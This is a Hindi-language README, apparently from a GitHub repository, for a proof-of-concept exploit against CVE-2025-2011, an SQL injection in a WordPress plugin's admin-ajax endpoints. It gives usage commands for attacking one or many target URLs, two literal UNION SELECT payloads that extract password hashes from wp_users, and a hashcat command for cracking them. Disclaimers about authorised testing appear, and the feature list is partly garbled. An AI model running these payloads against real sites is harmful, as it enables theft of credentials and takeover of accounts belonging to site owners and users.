
CVE-2025-2011 के लिए एक्सप्लॉइट
द्वारा: X3RX3S लेकिन गर्व से Ash Wesker द्वारा चुराया गया जिसने मेरे कोड को अपने बैनर के साथ GPT'd किया ;) यहाँ देखें ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 आप 'उसके' कोड में मेरा हैंडल भी देख सकते हैं -_-'
उद्देश्य: WordPress साइटों के विरुद्ध SQL इंजेक्शन भेद्यता (CVE-2025-2011) का परीक्षण करने के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट टूल।
अस्वीकरण: इसका उपयोग केवल उन सिस्टम्स पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास है। अनधिकृत परीक्षण अवैध और अनैतिक है।

-p 1 या -p 2 के साथ चयन योग्य)$2a$, $2b$, $2y$) हैश पहचान, जिसमें $wp$-उपसर्ग वाले वेरिएंट शामिल हैंresults_<hostname>.txt-m 3200) के लिए प्रॉम्प्ट सहित वैकल्पिक Hashcat एकीकरण-u) या फ़ाइल के माध्यम से कई लक्ष्यों (-f) का समर्थन करता हैrequestscoloramaनिर्भरताएँ स्थापित करें:
pip install requests colorama
वैकल्पिक (क्रैकिंग के लिए):
hashcat आपके PATH में स्थापित और उपलब्ध होना चाहिए (डिफ़ॉल्ट /usr/share/wordlists/rockyou.txt है)/usr/share/wordlists/rockyou.txtस्क्रिप्ट को निष्पादन योग्य बनाएं (वैकल्पिक):
chmod +x CVE-2025-2011.py
एकल लक्ष्य (डिफ़ॉल्ट पेलोड 1):
python3 CVE-2025-2011.py -u https://example.com
एकल लक्ष्य (पेलोड 2):
python3 CVE-2025-2011.py -u https://example.com -p 2
फ़ाइल से कई लक्ष्य (प्रति पंक्ति एक URL):
python3 CVE-2025-2011.py -f targets.txt
प्रत्येक परीक्षण किए गए होस्ट के लिए स्क्रिप्ट एक परिणाम फ़ाइल सहेजती है:
results_<hostname>.txt
यदि bcrypt हैश मिलते हैं, तो उन्हें hashes.txt में सहेजा जाता है और आपसे उन्हें Hashcat के साथ क्रैक करने के लिए कहा जाएगा। स्क्रिप्ट द्वारा उपयोग किया गया उदाहरण Hashcat कमांड:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
नोट: bcrypt डिज़ाइन द्वारा धीमा है। क्रैकिंग में बहुत लंबा समय लग सकता है और GPU की आवश्यकता हो सकती है।
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x
यह टूल केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग उन सिस्टम्स के विरुद्ध न करें जिनके लिए आपके पास स्पष्ट अनुमति नहीं है। लेखक और वितरक दुरुपयोग के लिए कोई जिम्मेदारी स्वीकार नहीं करते हैं। उन लक्ष्यों के विरुद्ध परीक्षण चलाने से पहले हमेशा लिखित प्राधिकरण प्राप्त करें जिनके आप मालिक नहीं हैं।
run_hashcat फ़ंक्शन को अपनी पसंदीदा सूची की ओर इंगित करने के लिए अपडेट करें।